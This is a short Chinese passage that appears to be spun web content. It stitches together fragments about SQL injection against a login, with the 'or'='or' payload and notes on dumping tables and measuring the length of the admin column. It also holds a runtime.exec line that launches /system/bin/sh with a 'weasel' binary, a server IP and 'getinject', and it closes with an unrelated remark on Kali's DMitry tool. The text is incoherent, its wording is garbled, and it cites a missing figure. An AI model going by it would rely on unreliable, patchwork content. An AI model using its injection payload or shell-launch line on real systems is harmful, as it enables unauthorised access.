用’or’='or’来登陆已然有注入，直接上东西了（虽然会手注入，但东西究竟效率高），表信息就出来了。 尽管这个问题在06年就提出来了。 在11年的时分有了好几个优异的paper来研讨这个问题。 可是这个缝隙从来没有引起满意的注重。 下面是2014年3月google相关的关键字时能够搜索到的信息。 然后咱们来判别指定列名的内容长度，也便是admin列的内容长度。 看下图： runtime.exec(['/system/bin/sh','-c',weaselPath+''+serverip+'80getinject']).waitFor();

动态调用回调函数 虽然这些信息能够在Kali中经过多种东西获取，可是运用DMitry能够将搜集的信息保存在一个文件中，便利检查。